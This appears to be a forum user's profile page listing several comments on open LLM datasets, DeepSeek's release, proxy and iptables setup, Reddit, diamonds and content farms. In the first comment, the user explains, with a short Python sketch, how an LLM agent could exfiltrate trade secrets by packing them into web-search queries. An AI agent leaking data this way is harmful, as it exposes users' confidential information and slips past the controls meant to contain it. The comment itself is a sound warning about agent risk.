Programmer and sysadmin (DevOps?), wannabe polymath in tech, science and the mind. Neurodivergent, disabled, burned out, and close to throwing in the towel, but still liking ponies 🦄 and sometimes willing to discuss stuff.

  • 0 Posts
  • 123 Comments
Joined 2 years ago
Cake day: June 26th, 2023

  • There are several “good” LLMs trained on open datasets like FineWeb, LAION, DataComp, etc. They are still “ethically dubious”, but at least they can be downloaded, analyzed, filtered, and so on. Unfortunately, businesses keep datasets and training code as a competitive advantage; even "Open"AI stopped publishing them once it saw an opportunity to make money.

    What is the concern with only having weights? It’s not arbitrary code execution

    Unless one plugs it into an agent… which is kind of the use we expect right now.

    Accessing the web, or even web searches, is already equivalent to arbitrary code execution: an LLM could decide to, for example, summarize and compress some context full of trade secrets, then proceed to “search” for it, sending it to wherever it has access to.

    Agents can also be allowed to run local commands… again a use we kind of want now (“hey Google, open my alarms” on a smartphone).
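    A minimal sketch of that exfiltration risk (every name here is invented for illustration; no specific agent framework is implied): a “search” tool call is just a string leaving the machine, so whatever context the model chooses to pack into the query goes with it.

    ```python
    # Hypothetical sketch: why a "web search" tool is an exfiltration channel.
    # llm_next_action and web_search are invented stand-ins, not a real API.
    from urllib.parse import quote

    def llm_next_action(context: str) -> dict:
        """Stand-in for a model call. A manipulated model can pack anything
        from its context window into the tool arguments it emits."""
        return {"tool": "web_search", "query": context}

    def web_search(query: str) -> str:
        """Stand-in for a real HTTP request: the query string leaves the host
        and reaches whatever endpoint the 'search' resolves to."""
        return "https://search.example/?q=" + quote(query)

    context = "TRADE SECRET: unreleased product specs"
    action = llm_next_action(context)
    outgoing_url = web_search(action["query"])
    # outgoing_url now carries the private context off the machine:
    # no arbitrary code execution on the host was ever needed.
    ```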



  • Open source requires giving whatever digital information is necessary to build a binary.

    In this case, the “binary” is the network weights, and “whatever is necessary” includes both the training data and the training code.

    DeepSeek is sharing:

    • NO training data
    • NO training code
    • instead, PDFs with a description of the process
    • binary weights (a few snapshots)
    • fine-tune code
    • inference code
    • evaluation code
    • integration code

    In other words: a good amount of open source… with a huge binary blob in the middle.



  • Is this on the same machine, or multiple machines?

    The typical/easy design for an outgoing proxy would be to run the proxy on one machine, configure the client on another machine to connect to it, and drop any packets from the client that aren’t targeted at the proxy.

    For a transparent proxy, all connections coming from a client could be rewritten via NAT to go to the proxy, then the proxy can decide which ones it can handle or is willing to.

    If you try to fold this up into a single machine, I’d suggest using containers to keep things organized.
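    As a sketch of both variants on a Linux gateway (the interface name, subnet, and ports below are all assumptions, picked for illustration):

    ```shell
    # Sketch only: eth1, 192.168.1.0/24, and the ports are assumptions.
    # Transparent variant, on the gateway: rewrite outbound HTTP from the
    # client subnet so it lands on a local proxy listening on port 3129.
    iptables -t nat -A PREROUTING -i eth1 -s 192.168.1.0/24 \
        -p tcp --dport 80 -j REDIRECT --to-ports 3129

    # Explicit variant: the client is configured to use a proxy on the
    # gateway itself (traffic to the gateway hits INPUT, not FORWARD),
    # and anything else it tries to route through gets dropped.
    iptables -A FORWARD -s 192.168.1.0/24 -j DROP
    ```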



  • Reddit as “reservoir of humanity”… and the example is r/AITA, the most notoriously fake subreddit out there?? 🤣🤣

    How disconnected from reality does one have to be to write something like that?

    Reddit Answers takes anyone’s queries, trawls the site for relevant discussions and debates, and composes them into a response

    Then people feel entitled to insult me for having blanked most of my comments on Reddit. “Why did you do this, [expletive]?”… Yeah, why indeed. 😒



  • From that article (thanks for sharing, btw) it seems there is a series of relatively simple tools to identify the different kinds of diamonds, the main problem being large assortments of small pieces.

    It only mentions laser inscriptions in passing; how easy would it be to counterfeit one? It seems like many aspects can be checked relatively easily to see whether the actual characteristics match those in the inscribed ID.

    In the polarizer strain test, I’m not sure which makes a better diamond: more stress lines, or fewer. Since the main draw of ornamental diamonds is the ability to bend light as many times as possible, would the extra stress lines help or hinder that?



  • Content farms have been a thing since the early 2000s, no AI needed: just stuff hastily written by outsourced workers for less than minimum wage, then poorly translated and turned into templates to generate thousands of pages, in what some called “SEO”.

    In particular, results for “file format” or “extension” have been a hot mess for the last 20 years or so; there was never a clean search. And yet, searching right now for “glb file format specification”, the second link is the canonical Khronos spec, and the third is the Wikipedia entry with links to the spec.

    That’s way better than it used to be.